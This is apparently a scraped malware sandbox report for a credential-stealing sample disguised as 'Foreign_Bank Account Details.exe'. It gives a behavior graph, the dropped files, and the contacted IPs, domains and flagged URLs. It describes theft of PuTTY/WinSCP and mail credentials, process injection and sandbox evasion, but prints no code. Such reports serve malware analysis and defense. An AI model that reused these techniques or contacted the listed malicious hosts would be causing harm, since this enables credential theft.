  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1613 Sample: Foreign_Bank Account Details.exe Startdate: 12/10/2021 Architecture: WINDOWS Score: 100 59 prda.aadg.msidentity.com 2->59 61 mail.cselegance.com 2->61 63 4 other IPs or domains 2->63 71 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->71 73 Multi AV Scanner detection for domain / URL 2->73 75 Potential malicious icon found 2->75 77 140 other signatures 2->77 8 Foreign_Bank Account Details.exe 2->8         started        11 mpam-f54ed867.exe 2->11         started        14 mpam-c45e5da5.exe 7 2->14         started        16 4 other processes 2->16 signatures3 process4 file5 87 Writes to foreign memory regions 8->87 89 Tries to detect Any.run 8->89 91 Hides threads from debuggers 8->91 18 RegAsm.exe 2 11 8->18         started        45 C:\Windows\...\mpuxagent.dll.mui, PE32 11->45 dropped 47 C:\Windows\...\ProtectionManagement.dll.mui, PE32 11->47 dropped 49 C:\Windows\...\MpEvMsg.dll.mui, PE32 11->49 dropped 57 193 other files (none is malicious) 11->57 dropped 93 Sample is not signed and drops a device driver 11->93 23 MpSigStub.exe 11->23         started        51 C:\Windows\ServiceProfiles\...\mpavdlta.vdm, PE32+ 14->51 dropped 53 C:\Windows\ServiceProfiles\...\mpasdlta.vdm, PE32+ 14->53 dropped 55 C:\Windows\ServiceProfiles\...\MpSigStub.exe, PE32+ 14->55 dropped 25 MpSigStub.exe 4 14->25         started        27 conhost.exe 16->27         started        29 conhost.exe 16->29         started        31 conhost.exe 16->31         started        33 conhost.exe 16->33         started        signatures6 process7 dnsIp8 65 cselegance.com 116.0.120.83, 49812, 587 GTC-MY-PIP-ASGlobalTransitCommunications-MalaysiaMY Malaysia 18->65 67 googlehosted.l.googleusercontent.com 142.250.186.33, 443, 49794 GOOGLEUS United States 18->67 69 drive.google.com 172.217.168.46, 443, 49793 GOOGLEUS United States 18->69 37 C:\Users\user\AppData\Roaming\...\tKZVPq.exe, PE32 18->37 dropped 39 C:\Windows\System32\drivers\etc\hosts, ASCII 18->39 dropped 79 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->79 81 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->81 83 Tries to steal Mail credentials (via file access) 18->83 85 7 other signatures 18->85 35 conhost.exe 18->35         started        41 C:\Windows\ServiceProfiles\...\mpavbase.vdm, PE32+ 25->41 dropped 43 C:\Windows\ServiceProfiles\...\mpasbase.vdm, PE32+ 25->43 dropped file9 signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.168.46
 drive.google.com United States
15169 GOOGLEUS false
116.0.120.83
 cselegance.com Malaysia
24218 GTC-MY-PIP-ASGlobalTransitCommunications-MalaysiaMY false
142.250.186.33
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
cselegance.com 116.0.120.83 true
drive.google.com 172.217.168.46 true
googlehosted.l.googleusercontent.com 142.250.186.33 true
doc-0c-28-docs.googleusercontent.com unknown unknown
mail.cselegance.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://110.42.4.180: true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://tempuri.org/ true
  • Avira URL Cloud: safe
 unknown
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/ true
  • Avira URL Cloud: safe
 unknown
http://spywaresoftstop.com/load.php?adv=141 true
  • Avira URL Cloud: safe
 unknown
http://www.searchmaid.com/ true
  • Avira URL Cloud: safe
 unknown
http://masgiO.info/cd/cd.php?id=%s&ver=g true
  • Avira URL Cloud: safe
 unknown
http://www.trotux.com/?z= false
    		high
    http://avnisevinc.blogspot.com/ false
      		high